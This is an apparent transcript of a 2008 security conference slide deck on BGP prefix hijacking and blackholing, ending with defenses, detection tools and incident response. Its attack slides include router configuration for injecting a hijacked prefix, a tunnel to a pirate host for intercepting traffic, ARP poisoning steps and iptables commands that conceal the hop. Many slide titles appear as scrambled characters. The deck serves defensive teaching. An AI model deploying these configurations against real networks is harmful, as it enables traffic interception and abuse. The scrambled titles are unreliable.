internet pirates: blackholing, hijacking and other dirty tricks
Post on 16-Jul-2015
1.944 Views
Preview:
TRANSCRIPT
Ngp_rcq md rfc Glrcplcr Blackholing, hijacking and other dirty tricks
Carlos Fragoso Mariscal
London 2008
Ufm _k G = • Informa(on Security Professional • Opera(ons and Security Manager for Supercompu(ng Center of Catalonia – Anella Cien(fica RREN, CATNIX IXP …
• Technical Director of one eSecurity • Involved in several IR communi(es – ABUSES, TF‐CSIRT, NSP‐SEC …
• SANS Volunteer since 2002 • Cisco Systems and GIAC Cer(fied – CCNA, CCNP*, GSEC, GCFW, GCIH
BGP OSPF
Fmu pmsrgle r_`jcq umpi =
Global
ISIS RIP StaDc Connected
Each rou(ng protocol builds its own table based on its metrics
1
Prefixes are elected based on prefix mask and administraDve distance
2
Prefixes are installed 3
More specific prefixes take precedence
@EN Qcjcargml ?jempgrfk 1. Highest Local Preference 2. Locally originated, aggregated, redistribu(on… 3. Shortest AS‐PATH 4. Lowest origin type 5. Lowest Mul( Exit Discriminator (MED) 6. eBGP over iBGP paths 7. Lowest IGP metric to next‐hop 8. Received first …etc…
Any prefix received with the local AS in its AS‐Path a5ribute is dropped
BGP table version is NNNNNNNN, local router ID is A.B.C.D Status codes: s suppressed, d damped, h history, * valid, > best, i – internal, r RIB‐failure, S Stale Origin codes: i ‐ IGP, e ‐ EGP, ? ‐ incomplete
Network Next Hop Metric Path * A.B.0.0 10.10.10.1 0 300 200 100 10 i * 10.10.20.1 0 300 100 80 i
Routing entry for A.B.0.0/16 Known via "bgp 1", distance 20, metric 0 Tag 7018, type external Last update from 10.10.20.1 1d00h ago Routing Descriptor Blocks: * 10.10.20.1, from 10.10.20.1, 1d00h ago Route metric is 0, traffic share count is 1 AS Hops 3 Route tag 7018
BGP table
Global table
Internet Rou(ng Registry (IRR)
• Route registra(on database • Rou(ng Policy descrip(on language (RFC 2622) • Common objects – route / route‐set – aut‐num / AS‐Set – Peering‐set
• Most well‐known – RADB – RIPE
route: A.B.0.0/19 descr: Monkey Business origin: AS100 mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered
as‐set: AS‐MONKEY‐CUSTOMERS descr: MONKEY CUSTOMERS members: AS100 members: AS200 members: AS300 tech‐c: MONK1‐RIPE admin‐c: MONK2‐RIPE mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered
Source: RIPE Whois Database – h6p://www.ripe.net/db/whois.html
route: C.D.0.0/24 descr: Monkey Shop origin: AS200 mnt‐by: MONKEY‐ISP‐MNT source: RIPE # Filtered
Rfpc_rq • Internet is a chain of trust – “A chain is only as strong as its weakest link”
• Weak peer filtering policies
• Unauthorized route IRR registra(on • Rou(ng infrastructure compromise
• Future BGP peering vulnerabili(es
Ngp_rcq md rfc Glrcplcr
Internet 101 A5acks Blackholing
MitM Hijacking
Ghost Hijacking
Countermeasures
@j_aifmjgle • Poisoning a more specific route – Ex: /24 overlapping main /19
• Traffic is dropped at des(na(on – Route to Null0
• Not very effec(ve for small prefixes (</24) – Depends on transit providers policies
KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise
• Prefix poisoning • Traffic intercep(on and abuse
• Traffic forwarding
• Obfusca(on (op(onal)
AS 10
AS 40
AS 20
AS 30
AS 100
AS 60
AS 50 AS 200
Based on “Stealing the Internet” Defcon Talk – h6p://www.defcon.org
KgrK Fgh_aigle • Vic(m reconaissance
– RR Database objects – Internet topology around it – NOC social engineering
• ASack Engineering – Plan reply path (take note of ASN’s) – Possible points of injec(on
• Rou(ng Infrastructure compromise • Prefix poisoning • Traffic intercep(on and abuse • Traffic forwarding • Obfusca(on (op(onal)
AS 100 AS 100 AS 10
AS 40
AS 20
AS 30
AS 60
AS 50 AS 200
Based on “Stealing the Internet” Defcon Talk – h6p://www.defcon.org
1.0.0.0/16
Pirate compromises rou(ng infrastructure on AS100
3
Pirate performs
reconaisance on AS200
1
KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise • Prefix poisoning – Specific BGP prefix injec(on – AS‐PATH prepend reply path ASN’s – Policy rou(ng to nail next‐hop on
• Traffic intercep(on and abuse • Traffic forwarding • Obfusca(on (op(onal)
Nmgqml Pmsrc Glhcargml ip prefix‐list NET A.B.C.0/24 route‐map hijacked permit 10
match ip address prefix‐list NET set as‐path prepend 10 20 200
route‐map hijacked permit 20
router bgp 100 neighbor <AS10_PEER> route‐map hijack out
AS 10
AS 40
AS 20
AS 30
AS 100
AS 60
AS 50 AS 200
Traffic is received by vic(m without no(cing abusive ac(vity.
6
Based on “Stealing the Internet” Defcon Talk – h6p://www.defcon.org
Traffic is abused (i.e.sniff) and sent back using AS10 (policy rou(ng)
5
Nmjgaw pmsrgle interface Tunnel10 description MONKEY‐PIRATE ip address 10.10.10.1 255.255.255.252 ip policy route‐map BACK tunnel source interface Loopback0 tunnel destination <PIRATE IP> ! interface FastEthernet0 description Link to AS10 PROVIDER ip address 172.16.1.1 255.255.255.252 ! ip route A.B.C.0 0.0.0.255 10.10.10.2 ip access‐list standard NET A.B.C.0 0.0.0.255 route‐map BACK permit 10
match ip address NET set ip next‐hop 172.16.1.2
route‐map BACK permit 20
?PN nmgqmlgle _rr_ai
192.168.0.1 FEEA:FEEA:FEEA
192.168.0.200 0001:0236:8624
192.168.0.20 000E:3858:AEDE
1. IP forwarding and sniffing activation
2. Send spoofed ARP reply (poison)
0:1:2:36:86:24 0:e:38:58:ae:de
arp reply 192.168.0.1 is-at 0:1:2:36:86:24
4. Traffic sent to default gateway
00-01-02-36-86-24 5. Traffic capture and forwarding
3. ARP update (poisoned) 192.168.0.1
00-01-02-36-86-24
KgrK Fgh_aigle • Vic(m reconaissance • ASack Engineering • Rou(ng Infrastructure compromise
• Prefix poisoning • Traffic intercep(on and abuse
• Traffic forwarding
• Obfusca(on (op(onal)
+ 10
Rp_acpmsrc bspgle Fgh_aigle ugrf RRJ _bbgrgtc rcaflgosc
Source: “Stealing the Internet” Defcon Talk – h6p://www.defcon.org
RRJ _bbgrgtc ml Jglsv
iptables ‐t mangle ‐I PREROUTING ‐i eth1 ‐j TTL ‐‐ttl‐inc N
iptables ‐t mangle ‐I POSTROUTING ‐o eth1 ‐j TTL ‐‐ttl‐inc N
sysctl ‐w net.ipv4.ip_forward=1
F_lbq-ml J_` • GNS3 graphical network simulator • Dynamips Cisco IOS emulator
• Dynagen network configura(on generator • VMWare Fusion VM’s for end nodes
Efmqr Fgh_aigle
• Unallocated space hijacking • Used temporarily by aSackers to hide their ac(vity and avoid abuse no(fica(ons
• Nowadays mostly used for spam but could be used for other dirty issues (terrorism)
• Legal issues who is responsible for something that doesn’t belong to anyone?
Npmrcargml • Review and harden your peerings • Register and protect your objects on IRR DB • Take Rou(ng Registry RIPE‐NCC training course – hSp://www.ripe.net/training/rr/index.html
• Hide your infrastructure: et up an(spoofing (ACL’s or RPF) and infrastructure (ACL’s) filtering
• Have beers with other NOC or SOC teams – Why not on a SANS conference? – Join mailing lists instead
Nccp pmsrc dgjrcpgle • Where ? – Customer side – Internet Exchange Points (IXP) / Private peerings – Transit providers
• What ? – Maximum number – AS‐Path – Prefixes (sta(c or dynamic)
o Tips’n’tricks – IRRToolset tool (RIPE‐NCC, ISC) – Bogon Route Servers (Cymru) – Secure BGP configura(on guides (Cymru, NIST, SANS RR papers)
Bcrcargml • Aler(ng Systems – Prefix‐based NIDS
• Tools – RIPE Rou(ng Informa(on Service MyASN
• hSp://www.ris.ripe.net/myasn.html
– Prefix Hijack Alert System (PHAS) • hSp://phas.netsec.colostate.edu/
– BGPMon Project • hSp://bgpmon.net/
– University of Roma iBGPPlay • hSp://ibgplay.caspur.it
@ENkml k_gj q_knjc Possible Prefix Hijack (Code: 11) 1 number of peer(s) detected this updates for your prefix A.B.C.0/19:
Update details: 2008‐11‐11 02:01 (UTC) A.B.C.0/24 Announced by: AS16735 (Companhia de Telecomunicacoes do Brasil Central)
Transit AS: 27664 (CTBC Multimedia) ASpath: 27664 16735
Pc_argml • Crying and screaming is allowed • Contact upstreams providers and related mates – If you did, remember them you paid their beers – iNOC Dial‐By‐Asn (iNOC‐DBA) SIP phone
• Pray for a prompt response – From hours to days – Depends on how important you are
• No(fy Law Enforcement Organiza(ons (LEO’s) if necessary
Qcaspc((mpgegl) @EN • Drao on IETF RPSEC Working Group • PKI authen(ca(on for IP address blocks mapping ASN assignments
• Digital signature carried over BGP transi(ve path aSribute
• Verifica(on on external device • “Chicken and Egg” problem … wai(ng for RFC and ISP deployment
References 1/2
• “Stealing the Internet” A.Pilisov, T.Kapela – Defcon 16 Conference hSp://www.defcon.org/html/links/defcon‐media‐archives.html#dc_16
• “BGP RouDng Security” D.Wendlandt – Carnegie Mellon University hSp://www.cs.cmu.edu/~dwendlan/rou(ng/
• “BGP Security resources” hSp://www.bgp4.as/security
References 2/2
• “BGP Vulnerability TesDng” S.Convery MaShew Franz hSp://www.blackhat.com/presenta(ons/bh‐usa‐03/bh‐us‐03‐convery‐franz‐v3.pdf
• “Hacking Cisco Networks Exposed” A.Vladimirov, A.Mikhailovsky – McGraw Hill ISBN: 0‐07‐225917‐5
top related